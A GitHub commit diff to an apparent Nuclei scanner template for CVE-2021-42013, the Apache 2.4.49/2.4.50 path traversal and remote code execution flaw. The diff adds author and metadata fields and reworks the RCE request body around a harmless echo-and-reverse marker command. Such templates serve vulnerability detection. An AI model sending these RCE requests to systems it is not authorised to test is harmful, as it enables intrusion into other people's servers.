Update CVE-2021-42013.yaml

patch-1
Prince Chaddha 2022-08-25 13:29:52 +05:30 committed by GitHub
parent 86376a976c
commit 2ff98d6879
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 6 deletions

View File

@ -2,7 +2,7 @@ id: CVE-2021-42013
info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
author: nvn1729,0xd0ff9,666asd
severity: critical
description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
@ -17,8 +17,13 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42013
cwe-id: CWE-22
metadata:
verified: true
tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
requests:
- raw:
- |+
@ -36,13 +41,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Content-Length: {{len('{{RCEPayload}}')}}
{{RCEPayload}}
echo Echo: CVE-2021-42013; echo; {{cmd}};
payloads:
RCEPayload:
- "echo Echo: CVE-2021-42013; echo; echo 31024-1202-EVC | rev;"
stop-at-first-match: true
unsafe: true
matchers-condition: or
matchers: